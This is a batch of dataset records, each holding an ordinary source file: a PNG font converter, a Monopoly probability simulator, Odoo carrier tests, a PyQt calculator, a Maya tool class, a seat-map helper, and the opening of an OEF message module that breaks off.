+{"seq_id":"640466201","text":"#!/usr/bin/env python3\n\n# png2pf\n# Convert PNG image to MiSTer UI font (1bpp bitmap),\n# and optionally a nicely formatted preview image.\n#\n# Program by David Lindecrantz \n# Distributed under the terms of the MIT license\n\nimport argparse\nimport functools\nimport os\nimport sys\nimport png\n\ndef is_file(parser, arg):\n if not os.path.isfile(arg): parser.error(\"file %s does not exist\" % arg)\n else: return arg\n\ndef chunks(seq, size):\n return (seq[pos:pos + size] for pos in range(0, len(seq), size))\n\n# read png as 2D bitmap array (bool[][])\ndef read_png_1bpp(path):\n (_, _, data, _) = png.Reader(file=open(path, \"rb\")).asRGBA8()\n bitmap = []\n for line in data:\n l = []\n for rgba in chunks(line, 4):\n l.append((rgba[3] > 127) and (0.2989 * rgba[0] + 0.5870 * rgba[1] + 0.1140 * rgba[2]) > 127)\n bitmap.append(l)\n return bitmap\n\n# slice 2D array into dim*dim sized tiles\ndef make_tiles(pixels, dim=8, num_chars=None):\n if len(pixels) % dim != 0:\n raise Exception(\"image height not a multiple of {}\".format(dim))\n if len(pixels[0]) % dim != 0:\n raise Exception(\"image width not a multiple of {}\".format(dim))\n tiles = []\n for y in range(0, len(pixels), dim):\n for x in range(0, len(pixels[0]), dim):\n tiles.append([pixels[y+yl][x:x+dim] for yl in range(dim)])\n if num_chars and len(tiles) >= num_chars:\n return tiles\n return tiles\n\n# write preview png\ndef write_preview(bitmap, path, dim=8, num_chars=None):\n scale = 4\n width = scale * (1 + len(bitmap[0]) + len(bitmap[0]) // dim)\n height = scale * (1 + len(bitmap) + len(bitmap) // dim)\n tiles = make_tiles(bitmap, dim)\n pixels = [bytearray(width) for i in range(height)]\n try:\n chars = 0\n for ypos in range(scale, height, scale * (dim + 1)):\n for xpos in range(scale, width, scale * (dim + 1)):\n blit_bitmap(tiles.pop(0), pixels, xpos, ypos, scale)\n chars += 1\n if num_chars and chars >= num_chars: raise StopIteration\n except StopIteration:\n pass\n with open(path, \"wb\") as file:\n writer = png.Writer(size=(width,height), greyscale=True, compression=9)\n writer.write(file, pixels)\n\n# blit bitmap (int/bool[][]) to pixel array (bytearray[][])\ndef blit_bitmap(src_bitmap, dest_pixels, xpos, ypos, scale=1):\n for srcy, row in enumerate(src_bitmap):\n for srcx, pixel in enumerate(row):\n val = int(pixel) if not isinstance(pixel, bool) else (255 if pixel else 0)\n dx = xpos + srcx * scale\n dy = ypos + srcy * scale\n for dx,dy in [(x,y) for x in range(dx, dx + scale) for y in range(dy, dy + scale)]:\n dest_pixels[dy][dx] = val\n\ndef main():\n try:\n parser = argparse.ArgumentParser()\n 
parser.add_argument(\"-i\", \"--in-png\", dest=\"in_png\", metavar=\"FILE\", required=True, type=lambda x: is_file(parser, x), help=\"input png\")\n parser.add_argument(\"-o\", \"--out-pf\", dest=\"out_pf\", metavar=\"FILE\", help=\"output bitmap\")\n parser.add_argument(\"-p\", \"--out-preview\", dest=\"out_preview\", metavar=\"FILE\", help=\"output preview image\")\n parser.add_argument(\"-n\", \"--num-chars\", dest=\"num_chars\", type=int, help=\"limit number of characters to process\")\n args = parser.parse_args()\n\n bitmap = read_png_1bpp(args.in_png)\n\n if args.out_pf:\n pf = bytearray()\n for tile in make_tiles(bitmap, num_chars=args.num_chars):\n for line in tile:\n pf.append(functools.reduce(lambda a,b: (a << 1) + b, line))\n with open(args.out_pf, \"wb\") as file:\n file.write(pf)\n\n if args.out_preview:\n write_preview(bitmap, args.out_preview, num_chars=args.num_chars)\n\n return 0\n\n except Exception as err:\n print(\"error - {}\".format(err))\n sys.exit(1)\n\nif __name__ == \"__main__\":\n sys.exit(main())\n","sub_path":"tools/png2pf.py","file_name":"png2pf.py","file_ext":"py","file_size_in_byte":3726,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"199668345","text":"# import lists from other files\nfrom streets import streetsList\nfrom streets import street_colors\nfrom chanceCards import chanceCardList\nfrom comChestCards import comChestCardList\nimport random\nimport PySimpleGUI as Sg\nimport matplotlib.pyplot as plt\nfrom matplotlib import style\nimport numpy as np\nfrom tqdm import tqdm\n\nstyle.use(\"ggplot\")\n\n# Creating input layout\nlayout = [\n [Sg.Text(\"How many throws do you want to make?\")],\n [Sg.Input(1000)],\n [Sg.Checkbox(\"Show Moves\"), Sg.Checkbox(\"Show Progress\"), Sg.Checkbox(\"Show Streets Only\")],\n [Sg.Checkbox(\"Jail\", default=True), Sg.Checkbox(\"Triple Dice Jail\", default=True),\n Sg.Checkbox(\"Community Chest Cards\", default=True), Sg.Checkbox(\"Chance Cards\", default=True)],\n [Sg.Text(\"(Showing Progress will make the calculation slower)\")],\n [Sg.Submit(\"Run\"), Sg.CloseButton(\"Exit\")]\n]\n\n# Showing input window\nwindow = Sg.Window(\"Monopoly Probability\").Layout(layout)\nbutton, values = window.Read()\n\nif button == \"Exit\":\n exit()\n\n# Defining user inputs\nruns = int(values[0])\nshowMoves = values[1]\nshowProgress = values[2]\nshowOnlyStreets = values[3]\njail = values[4]\ntripleJail = values[5]\ncomChestCards = values[6]\nchanceCards = values[7]\n\n# creating copies of chance- and comChestLists\ncopyChanceCardList = list(chanceCardList)\ncopyComChestCardList = list(comChestCardList)\n\n# creating the Result list and the ProbabilityList\nresultList = []\nprobList = []\nstreet_occur_list = []\n\n# defining original values for different variables\nnewPosIndex = 0\nthrows = 0\nchanceCardsDrawn = 0\ncomChestCardsDrawn = 0\nprogress = 0\nfirstThrow = 0\n\n# start loop\nfor _ in tqdm(range(runs)):\n same1 = False\n same2 = False\n # throw dice\n dice1 = random.randint(1, 6)\n dice2 = random.randint(1, 6)\n throw = dice1 + dice2\n throws += 1\n\n # Two of same dice\n if tripleJail:\n if dice1 == dice2 and same2:\n newPosIndex = 10\n if dice1 == dice2 and same1:\n same2 = True\n if dice1 == dice2:\n same1 = True\n\n # general movement\n posIndex = newPosIndex\n pos = streetsList[posIndex]\n if not same2:\n newPosIndex = posIndex + throw\n if same2:\n newPosIndex = 10\n if newPosIndex > 39:\n diff = newPosIndex - 40\n newPosIndex = 0 + diff\n\n # move when chance card 
draw\n if chanceCards:\n if newPosIndex == 7 or newPosIndex == 22 or newPosIndex == 36:\n cardDraw = random.randint(0, (len(chanceCardList)-1))\n if cardDraw == 0:\n newPos = streetsList[newPosIndex]\n resultList.append(newPos)\n newPosIndex = 0\n if cardDraw == 1:\n newPos = streetsList[newPosIndex]\n resultList.append(newPos)\n newPosIndex = 21\n if cardDraw == 2:\n newPos = streetsList[newPosIndex]\n resultList.append(newPos)\n newPosIndex = 11\n if cardDraw == 3:\n if newPosIndex == 7 or newPosIndex == 36:\n newPos = streetsList[newPosIndex]\n resultList.append(newPos)\n newPosIndex = 12\n if newPosIndex == 22:\n newPos = streetsList[newPosIndex]\n resultList.append(newPos)\n newPosIndex = 28\n if cardDraw == 4 or cardDraw == 5:\n if newPosIndex == 7:\n newPos = streetsList[newPosIndex]\n resultList.append(newPos)\n newPosIndex = 15\n if newPosIndex == 22:\n newPos = streetsList[newPosIndex]\n resultList.append(newPos)\n newPosIndex = 25\n if newPosIndex == 36:\n newPos = streetsList[newPosIndex]\n resultList.append(newPos)\n newPosIndex = 5\n if cardDraw == 6:\n newPos = streetsList[newPosIndex]\n resultList.append(newPos)\n newPosIndex -= 3\n if cardDraw == 7:\n newPos = streetsList[newPosIndex]\n resultList.append(newPos)\n newPosIndex = 10\n chanceCardList.pop(cardDraw)\n chanceCardsDrawn += 1\n if chanceCardsDrawn == 16:\n chanceCardList = list(copyChanceCardList)\n chanceCardsDrawn = 0\n\n # move when com chest cards draw\n if comChestCards:\n if newPosIndex == 2 or newPosIndex == 17 or newPosIndex == 33:\n cardDraw = random.randint(0, (len(comChestCardList) - 1))\n if cardDraw == 0:\n newPos = streetsList[newPosIndex]\n resultList.append(newPos)\n newPosIndex = 0\n if cardDraw == 1:\n newPos = streetsList[newPosIndex]\n resultList.append(newPos)\n newPosIndex = 10\n comChestCardList.pop(cardDraw)\n comChestCardsDrawn += 1\n if comChestCardsDrawn == 16:\n comChestCardList = list(copyComChestCardList)\n comChestCardsDrawn = 0\n\n # find landing spot and add to result list\n newPos = streetsList[newPosIndex]\n resultList.append(newPos)\n\n # move - land on prison\n if jail:\n if newPosIndex == 30:\n newPosIndex = 10\n # show end position\n\n # create Probability list\n for x in streetsList:\n streetOccur = resultList.count(x)\n street_occur_list.append(str(streetOccur))\n streetProb = \"%.2f\" % float(float(streetOccur / throws) * 100)\n probList.append(streetProb)\n\n results_bar = sorted(zip(probList, streetsList, street_colors, street_occur_list))\n\n\n common_streets = [topic[1] for topic in results_bar]\n y_pos = np.arange(len(common_streets))\n street_prob_1 = [topic[0] for topic in results_bar]\n street_prob = []\n for x in street_prob_1:\n street_prob.append(float(x))\n bar_color = [topic[2] for topic in results_bar]\n street_occur_1 = [topic[3] for topic in results_bar]\n street_occur = []\n for x in street_occur_1:\n street_occur.append(int(x))\n\n plt.figure(figsize=(12, 7))\n plt.bar(y_pos, street_prob, align=\"center\", alpha=1, color=bar_color)\n\n plt.xticks(y_pos, common_streets, rotation=\"vertical\")\n plt.ylabel(\"Probability %\")\n\n for i in range(len(y_pos)):\n plt.text(x=y_pos[i]-0.1, y=street_prob[i] + 0.1, s=street_occur[i], size=6, rotation=\"vertical\")\n\n plt.title(f\"Monopoly Streets Probability \\n {throws} throws\")\n plt.savefig(f\"graph_video/images/{throws}.png\")\n plt.close()\n\n probList = []\n street_occur = []\n street_prob = []\n street_occur_list = 
[]\n\n\n","sub_path":"main_image.py","file_name":"main_image.py","file_ext":"py","file_size_in_byte":6829,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"570566253","text":"# -*- coding: utf-8 -*-\n# Copyright 2017 Akretion (http://www.akretion.com).\n# @author Sébastien BEAU \n# License AGPL-3.0 or later (http://www.gnu.org/licenses/agpl).\n\nfrom odoo.addons.shopinvader.tests.test_cart import CommonConnectedCartCase\n\n\nclass CarrierCase(CommonConnectedCartCase):\n\n def setUp(self):\n super(CarrierCase, self).setUp()\n self.free_carrier = self.env.ref('delivery.free_delivery_carrier')\n self.poste_carrier = self.env.ref('delivery.delivery_carrier')\n\n def _set_carrier(self, carrier):\n response = self.service.dispatch('add_carrier', params={\n 'carrier': {'id': carrier.id},\n })\n self.assertEqual(self.cart.carrier_id.id, carrier.id)\n return response['data']\n\n def test_available_carriers(self):\n response = self.service.dispatch('search')\n self.assertIn('available_carriers', response['data']['shipping'])\n shipping = response['data']['shipping']\n self.assertEqual(shipping['available_carriers']['count'], 2)\n\n def test_setting_free_carrier(self):\n cart = self._set_carrier(self.free_carrier)\n self.assertEqual(cart['shipping']['amount']['total'], 0)\n\n def test_setting_poste_carrier(self):\n cart = self._set_carrier(self.poste_carrier)\n # Check shipping amount\n self.assertEqual(cart['shipping']['amount']['total'], 20)\n self.assertEqual(cart['shipping']['amount']['untaxed'], 17.39)\n self.assertEqual(cart['shipping']['amount']['tax'], 2.61)\n\n # Check items amount\n self.assertEqual(cart['lines']['amount']['total'], 8555.0)\n self.assertEqual(cart['lines']['amount']['untaxed'], 8555.0)\n self.assertEqual(cart['lines']['amount']['tax'], 0)\n\n # Check total amount\n self.assertEqual(cart['amount']['total'], 8575.0)\n self.assertEqual(cart['amount']['untaxed'], 8572.39)\n self.assertEqual(cart['amount']['tax'], 2.61)\n\n def test_should_only_return_matching_carrier(self):\n # change country to make first carrier method not available\n self.free_carrier.write({\n 'country_ids': [(6, 0, self.env.ref('base.us').ids)],\n })\n response = self.service.dispatch('update', params={\n 'step': {'current': 'cart_address'},\n })\n # shipping information should be available now\n shipping = response['data']['shipping']\n self.assertEqual(shipping['available_carriers']['count'], 1)\n\n def test_update_cart_update_price(self):\n self.env.ref('product.product_product_24').weight = 4\n cart = self._set_carrier(self.poste_carrier)\n self.assertEqual(cart['shipping']['amount']['total'], 50)\n self.assertEqual(cart['shipping']['amount']['untaxed'], 43.48)\n self.assertEqual(cart['shipping']['amount']['tax'], 6.52)\n\n response = self.service.dispatch('update_item', params={\n 'item_id': self.env.ref('shopinvader.sale_order_line_4').id,\n 'item_qty': 1,\n })\n shipping = response['data']['shipping']\n self.assertEqual(shipping['amount']['total'], 20)\n self.assertEqual(shipping['amount']['untaxed'], 17.39)\n self.assertEqual(shipping['amount']['tax'], 2.61)\n\n def test_setting_address_set_default_carrier(self):\n response = self.service.dispatch('update', params={\n 'shipping': {'address': {'id': self.address.id}},\n })\n shipping = response['data']['shipping']\n self.assertEqual(\n shipping['selected_carrier']['id'], self.free_carrier.id)\n\n def test_changing_with_compatible_address_keep_carrier(self):\n 
self._set_carrier(self.poste_carrier)\n response = self.service.dispatch('update', params={\n 'shipping': {'address': {'id': self.address.id}},\n })\n shipping = response['data']['shipping']\n self.assertEqual(\n shipping['selected_carrier']['id'], self.poste_carrier.id)\n\n def test_changing_with_incompatible_address_change_carrier(self):\n self.free_carrier.write({\n 'country_ids': [(6, 0, self.env.ref('base.fr').ids)],\n })\n response = self.service.dispatch('update', params={\n 'shipping': {\n 'address': {\n 'id': self.env.ref('shopinvader.partner_1_address_2').id\n }\n },\n })\n shipping = response['data']['shipping']\n self.assertEqual(\n shipping['selected_carrier']['id'], self.poste_carrier.id)\n\n def test_add_item_without_cart_should_work(self):\n with self.work_on_services(\n partner=None,\n shopinvader_session={}) as work:\n service = work.component(usage='cart')\n response = service.dispatch('add_item', params={\n 'product_id': self.env.ref('product.product_product_4b').id,\n 'item_qty': 1,\n })\n self.assertEqual(response['data']['lines']['count'], 1)\n","sub_path":"shopinvader_delivery_carrier/tests/test_carrier.py","file_name":"test_carrier.py","file_ext":"py","file_size_in_byte":5066,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"645527166","text":"import sys\nfrom functools import partial\nfrom PyQt5.QtWidgets import *\n\nfrom model import evaluateExpression\nfrom view import PyCalcUi\n\n\nclass PyCalcCtrl:\n def __init__(self, view, model):\n self._evalute = model\n self._view = view\n self._connectSignals()\n\n def _calculateResult(self):\n res = self._evalute(expression=self._view.displayText())\n self._view.setDisplayText(res)\n\n def _buildExpression(self, sub_exp):\n if self._view.displayText() == \"Error\":\n self._view.clearDisplay()\n\n expression = self._view.displayText() + sub_exp\n self._view.setDisplayText(expression)\n\n def _connectSignals(self):\n for btnText, btn in self._view.buttons.items():\n if btnText not in {'=', 'C'}:\n btn.clicked.connect(partial(self._buildExpression, btnText))\n\n self._view.buttons['C'].clicked.connect(self._view.clearDisplay)\n self._view.buttons['='].clicked.connect(self._calculateResult)\n # self._view.display.returnPressed.connect(self._calculateResult)\n\ndef main():\n pycalc = QApplication([])\n view = PyCalcUi()\n view.show()\n\n model = evaluateExpression\n\n PyCalcCtrl(view=view, model=model)\n sys.exit(pycalc.exec_())\n\nif __name__ == '__main__':\n main()","sub_path":"zref/controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":1293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"288699655","text":"import maya.cmds as cmds\r\nimport random\r\n\r\n\r\nclass ToolKit:\r\n def __init__(self):\r\n pass\r\n\r\n def value_check(self, values):\r\n \"\"\"\r\n Checks values to ensure all values are of type float or int\r\n input: list\r\n return: list of only int or float values\r\n \"\"\"\r\n result = list()\r\n for val in values:\r\n if type(val) == int or type(val) == float:\r\n result.append(val)\r\n return result\r\n\r\n def add(self, values):\r\n \"\"\"\r\n Adds list of numbers and returns result\r\n input: list of float/int values\r\n return: float\r\n \"\"\"\r\n result = 0\r\n current = self.value_check(values)\r\n for val in current:\r\n result += val\r\n print(str(values) + ' adds up to ' + str(result))\r\n return result\r\n\r\n def subtract(self, values):\r\n \"\"\"\r\n Subtracts 
a list of numbers from the first number in the list and returns result\r\n input: list of float/int values\r\n return: float\r\n \"\"\"\r\n current = self.value_check(values)\r\n result = current[0]\r\n for val in values[1:]:\r\n result -= val\r\n print(str(values[0]) + ' minus ' + str(values[1:]) + ' is ' + str(result))\r\n return result\r\n\r\n def multiply(self, values):\r\n \"\"\"\r\n Multiplies a list of numbers and returns result\r\n input: list of float/int values\r\n return: float\r\n \"\"\"\r\n current = self.value_check(values)\r\n result = current[0]\r\n for val in current:\r\n result *= val\r\n print(str(values) + ' multiplies up to ' + str(result))\r\n return result\r\n\r\n def divide(self, values):\r\n \"\"\"\r\n Subtracts a list of numbers from the first number in the list and returns result\r\n input: list of float/int values\r\n return: float\r\n \"\"\"\r\n current = self.value_check(values)\r\n result = current[0]\r\n for val in values[1:]:\r\n if val != 0:\r\n result /= val\r\n else:\r\n print('Error: Divide by zero')\r\n print(str(values[0]) + ' divided by ' + str(values[1:]) + ' is ' + str(result))\r\n return result\r\n\r\n def power(self, values):\r\n \"\"\"\r\n Raises the value of 'values[0]' to the power of 'values[1]'\r\n input: list of float/int values\r\n return: float\r\n \"\"\"\r\n import math\r\n current = self.value_check(values)\r\n if len(current) >= 2:\r\n result = math.pow(current[0], current[1])\r\n print(str(current[0]) + ' to the power of ' + str(current[1]) + ' is ' + str(result))\r\n return result\r\n else:\r\n print('Error: Not enough valid float/int values in list')\r\n return 0\r\n\r\n def mean(self, values):\r\n \"\"\"\r\n Finds the mean of a list of values\r\n input: list of float/int values\r\n return: float\r\n \"\"\"\r\n current = self.value_check(values)\r\n result = self.add(current) / len(current)\r\n print('The mean of ' + str(values) + ' is ' + str(result))\r\n return result\r\n\r\n def median(self, values):\r\n \"\"\"\r\n Finds the median of a list of values\r\n input: list of float/int values\r\n return: float\r\n \"\"\"\r\n import math\r\n current = self.value_check(values)\r\n current.sort()\r\n middle = int(math.floor(len(current) / 2))\r\n if len(current) % 2 == 0:\r\n result = (current[middle - 1] + current[middle]) / 2\r\n else:\r\n result = current[middle]\r\n print('The median of ' + str(current) + ' is ' + str(result))\r\n return result\r\n\r\n def mode(self, values):\r\n \"\"\"\r\n Finds the mode of a list of values\r\n input: list of float/int values\r\n return: float\r\n \"\"\"\r\n current = self.value_check(values)\r\n count = 1\r\n mode_count = 1\r\n current.sort()\r\n number = current[0]\r\n result = number\r\n for val in current[1:]:\r\n if val == number:\r\n count += 1\r\n else:\r\n if count > mode_count:\r\n mode_count = count\r\n result = number\r\n count = 1\r\n number = val\r\n if mode_count == 1:\r\n print('All numbers in this list appear only once')\r\n return 0\r\n else:\r\n print('The mode is ' + str(result) + ' which appears ' + str(mode_count) + ' times')\r\n assert isinstance(result, object)\r\n return result\r\n\r\n def center_locator(self, give_individual_centers):\r\n \"\"\"\r\n Finds the median of a list of values\r\n input: boolean\r\n return: none\r\n \"\"\"\r\n sels = cmds.ls(sl=True)\r\n locators = list()\r\n min_x = list()\r\n min_y = list()\r\n min_z = list()\r\n max_x = list()\r\n max_y = list()\r\n max_z = list()\r\n total = [0, 0, 0]\r\n if give_individual_centers:\r\n for obj in sels:\r\n 
split_name = obj.split('.[]_:')\r\n                new_name = ''\r\n                for word in split_name:\r\n                    new_name += '%s_' % word\r\n                new_name += 'Loc'\r\n                bounding_box = cmds.xform(obj, query=True, ws=True, boundingBox=True)\r\n                if cmds.objectType(obj) == 'joint':\r\n                    joint_translate = cmds.xform(obj, query=True, translation=True, worldSpace=True)\r\n                    joint_rotate = cmds.xform(obj, query=True, rotation=True, worldSpace=True)\r\n                    cmds.spaceLocator(name=new_name)\r\n                    cmds.xform(new_name, translation=joint_translate, worldSpace=True)\r\n                    cmds.xform(new_name, rotation=joint_rotate, worldSpace=True)\r\n                else:\r\n                    x = (bounding_box[0] + bounding_box[3]) / 2\r\n                    y = (bounding_box[1] + bounding_box[4]) / 2\r\n                    z = (bounding_box[2] + bounding_box[5]) / 2\r\n                    cmds.spaceLocator(name=new_name)\r\n                    cmds.xform(new_name, worldSpace=True, translation=(x, y, z))\r\n                    current_rotation = cmds.xform(obj, worldSpace=True, rotation=True, query=True)\r\n                    rot_x = current_rotation[0]\r\n                    rot_y = current_rotation[1]\r\n                    rot_z = current_rotation[2]\r\n                    cmds.xform(new_name, worldSpace=True, rotation=(rot_x, rot_y, rot_z))\r\n                locators.append(new_name)\r\n            return locators\r\n        else:\r\n            for obj in sels:\r\n                bounding_box = cmds.xform(obj, query=True, worldSpace=True, boundingBox=True)\r\n                min_x.append(bounding_box[0])\r\n                min_y.append(bounding_box[1])\r\n                min_z.append(bounding_box[2])\r\n                max_x.append(bounding_box[3])\r\n                max_y.append(bounding_box[4])\r\n                max_z.append(bounding_box[5])\r\n            min_x.sort()\r\n            min_y.sort()\r\n            min_z.sort()\r\n            max_x.sort()\r\n            max_y.sort()\r\n            max_z.sort()\r\n            total[0] = (min_x[0] + max_x[len(max_x) - 1]) / 2\r\n            total[1] = (min_y[0] + max_y[len(max_y) - 1]) / 2\r\n            total[2] = (min_z[0] + max_z[len(max_z) - 1]) / 2\r\n            cmds.spaceLocator(name='TrueCenter_Loc')\r\n            cmds.xform('TrueCenter_Loc', worldSpace=True, translation=(total[0], total[1], total[2]))\r\n\r\n    def color_changer(self, color):\r\n        \"\"\"\r\n        Changes color of object to specified color\r\n        input: string (yellow, red, blue, green, purple, orange, black, or white)\r\n        return: none\r\n        \"\"\"\r\n        this_color = {\r\n            'yellow': lambda: 16,\r\n            'red': lambda: 12,\r\n            'blue': lambda: 5,\r\n            'green': lambda: 13,\r\n            'purple': lambda: 7,\r\n            'orange': lambda: 11,\r\n            'black': lambda: 1,\r\n            'white': lambda: 15\r\n        }.get(color, lambda: 6)()\r\n        selection = cmds.ls(sl=True)\r\n        shapes = cmds.listRelatives(selection, shapes=True, children=True)\r\n        for shape in shapes:\r\n            cmds.setAttr('%s.overrideEnabled' % shape, True)\r\n            cmds.setAttr('%s.overrideColor' % shape, this_color)\r\n\r\n    def random_spawner(self, amount, grow_flag, move_range, scale_lower, scale_upper):\r\n        \"\"\"\r\n        Randomly places duplicates of selected object around object\r\n        input: int, boolean, float, float, float\r\n        return: none\r\n        \"\"\"\r\n        spawn_num = 1\r\n        selection = cmds.ls(sl=True)\r\n        polygons = cmds.filterExpand(selection, sm=12)\r\n        if len(polygons) > 1:\r\n            poly = cmds.polyUnite(polygons)\r\n        else:\r\n            poly = polygons\r\n        cmds.rename(poly[0], 'Spawn_' + str(spawn_num))\r\n        polygons[0] = 'Spawn_' + str(spawn_num)\r\n        cmds.DeleteHistory((polygons[0]))\r\n        cmds.xform('Spawn_' + str(spawn_num), pivots=(0, 0, 0), ws=True)\r\n        if grow_flag:\r\n            i = 0\r\n            while i < amount:\r\n                polygon = cmds.duplicate('Spawn_' + str(spawn_num))\r\n                cmds.rename(polygon[0], 'CurrentSpawn')\r\n                current_position = cmds.xform('CurrentSpawn', ws=True, query=True, translation=True)\r\n                move_adj_x = random.randrange(-1 * move_range, move_range)\r\n                move_adj_z = random.randrange(-1 * move_range, move_range)\r\n                x = current_position[0] + move_adj_x\r\n                y = current_position[1]\r\n                z = current_position[2] + move_adj_z\r\n                scale_adj = random.randrange(scale_lower, scale_upper)\r\n                cmds.scale(scale_adj, scale_adj, scale_adj, 'CurrentSpawn')\r\n                cmds.move(x, y, z, 'CurrentSpawn')\r\n                spawn_num += 1\r\n                cmds.rename('CurrentSpawn', 'Spawn_' + str(spawn_num))\r\n                polygons[len(polygons) - 1] = 'Spawn_' + str(spawn_num)\r\n                i += 1\r\n        else:\r\n            i = 0\r\n            while i < amount:\r\n                polygon = cmds.duplicate('Spawn_' + str(spawn_num))\r\n                cmds.rename(polygon[0], 'CurrentSpawn')\r\n                x = random.randrange(-1 * move_range, move_range)\r\n                z = random.randrange(-1 * move_range, move_range)\r\n                scale_adj = random.randrange(scale_lower, scale_upper)\r\n                cmds.scale(scale_adj, scale_adj, scale_adj, 'CurrentSpawn')\r\n                cmds.move(x, 0, z, 'CurrentSpawn', ws=True)\r\n                spawn_num += 1\r\n                cmds.rename('CurrentSpawn', 'Spawn_' + str(spawn_num))\r\n                polygons[len(polygons) - 1] = 'Spawn_' + str(spawn_num)\r\n                i += 1\r\n\r\n        cmds.group(polygons, name='Geometry')\r\n\r\n    def sequential_renamer(self, name_format):\r\n        \"\"\"\r\n        Renames selected objects in sequential order\r\n        input: string, with # signs in place of desired numbers\r\n        return: none\r\n        \"\"\"\r\n        selection = cmds.ls(sl=True)\r\n        polygons = cmds.filterExpand(selection, sm=12)\r\n        arg_length = len(name_format)\r\n        tokens = name_format.split('#')\r\n        print(tokens)\r\n        tokens_length = len(tokens[0]) + len(tokens[len(tokens) - 1])\r\n        num_length = arg_length - tokens_length\r\n\r\n        i = 0\r\n        while i < len(polygons):\r\n            zero_string = ''\r\n            loop_number = i + 1\r\n            current_zeros = num_length - len(str(loop_number))\r\n            j = 0\r\n            while j < current_zeros:\r\n                zero_string += '0'\r\n                j += 1\r\n            current_number = zero_string + str(loop_number)\r\n            current_name = tokens[0] + current_number + tokens[len(tokens) - 1]\r\n            cmds.rename(polygons[i], current_name)\r\n            i += 1\r\n\r\n    def control_maker(self, color):\r\n        \"\"\"\r\n        Creates control circle on selected objects\r\n        input: string (yellow, red, blue, green, purple, orange, black, or white)\r\n        return: none\r\n        \"\"\"\r\n        objects = self.center_locator(True)\r\n        for obj in objects:\r\n            split_name = obj.split('_')\r\n            split_name.pop(len(split_name) - 1)\r\n            new_name = ''\r\n            for word in split_name:\r\n                new_name += '%s_' % word\r\n            new_name += 'Ctrl'\r\n            grp_name = '%s_Grp' % new_name\r\n            cmds.circle(name=new_name)\r\n            self.color_changer(color)\r\n            position = cmds.xform(obj, q=True, ws=True, rp=True)\r\n            cmds.xform(new_name, ws=True, t=position)\r\n            cmds.group(empty=True, name=grp_name)\r\n            cmds.parent(new_name, grp_name)\r\n","sub_path":"OldScripts/Scripts/tools.py","file_name":"tools.py","file_ext":"py","file_size_in_byte":12816,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
{"seq_id":"327004505","text":"# -*- coding:utf-8 -*-\n\nimport json\n\n\nclass SaleLayout(object):\n\n    ROBOT_LIBRARY_SCOPE = 'GLOBAL'\n    ROBOT_LIBRARY_VERSION = '0.1'\n\n    cabin_level = []\n    cabin_detail = []\n\n\n    def __init__(self):\n        pass\n\n\n    def clear_salelayout(self):\n        self.cabin_level = []\n        self.cabin_detail = []\n\n\n    def create_salelayout(self, templatename, *param):\n\n        '''\n        Create a seat map: assembles the seat-map information. Pass the cabinLevel information first; after all cabinLevel information has been passed, pass one empty value (an empty cell in Robot Framework), then pass the cabinDetail information.\n        :param Argument order: templatename: template name; cabinLevel [cabin->enlargeCount->enlargePercent] - cabinDetail [cabin->limitCount->cabinClassName->isNesting]\n        '''\n\n        saleLayout = {\"type\":\"createSaleLayout\",\n                      \"tempalteCode\": templatename}\n\n        for i in 
range(len(param)-2):\n if param[i] == '':\n j = i\n h=0\n for k in range(0, j/3):\n cabinlevel = self.create_cabinLevel(*param[h:h+3])\n saleLayout[\"cabinLevel\"] = cabinlevel\n h+=3\n\n cabindetail = self.create_cabinDetail(*param[j+1:])\n saleLayout['cabinDetail'] = cabindetail\n return json.dumps(saleLayout)\n\n\n def create_cabinLevel(self, *param):\n j=0\n for i in range((len(param))/3):\n cabinlevel = {\"cabin\": param[j],\n \"enlargeCount\":param[j+1],\n \"enlargePercent\":param[j+2]}\n j+=3\n self.cabin_level.append(cabinlevel)\n return self.cabin_level\n\n\n def create_cabinDetail(self, *params):\n j=0\n for i in range((len(params))/4):\n cabindetail = {\"cabin\":params[j],\n \"limitCount\":params[j+1],\n \"cabinClassName\":params[j+2],\n \"isNesting\":params[j+3]}\n j+=4\n self.cabin_detail.append(cabindetail)\n return self.cabin_detail\n\n\n# s = SaleLayout()\n# print s.create_salelayout(\"temp\", \"F\", \"0\", \"10\", \"C\", \"0\", \"20\", \"\", \"F\", \"19\", \"Y3\", \"1\", \"F\", \"30\", \"A\", \"1\", \"C\", \"40\", \"U\", \"1\")\n# s.clear_salelayout()\n# print s.create_salelayout(\"temp\", \"F\", \"0\", \"10\", \"C\", \"0\", \"20\", \"\", \"F\", \"19\", \"Y3\", \"1\", \"F\", \"30\", \"A\", \"1\", \"C\", \"40\", \"U\", \"1\")\n","sub_path":"01Flight/SaleLayout.py","file_name":"SaleLayout.py","file_ext":"py","file_size_in_byte":2348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"406290111","text":"# -*- coding: utf-8 -*-\n\n# ------------------------------------------------------------------------------\n#\n# Copyright 2018-2019 Fetch.AI Limited\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n# ------------------------------------------------------------------------------\n\n\"\"\"This module contains the default message definition.\"\"\"\nfrom enum import Enum\nfrom typing import Optional, List, cast\n\nfrom aea.protocols.base import Message\nfrom aea.protocols.oef.models import Description, Query\n\n\nclass OEFMessage(Message):\n \"\"\"The OEF message class.\"\"\"\n\n protocol_id = \"oef\"\n\n class Type(Enum):\n \"\"\"OEF Message types.\"\"\"\n\n REGISTER_SERVICE = \"register_service\"\n REGISTER_AGENT = \"register_agent\"\n UNREGISTER_SERVICE = \"unregister_service\"\n UNREGISTER_AGENT = \"unregister_agent\"\n SEARCH_SERVICES = \"search_services\"\n SEARCH_AGENTS = \"search_agents\"\n OEF_ERROR = \"oef_error\"\n DIALOGUE_ERROR = \"dialogue_error\"\n SEARCH_RESULT = 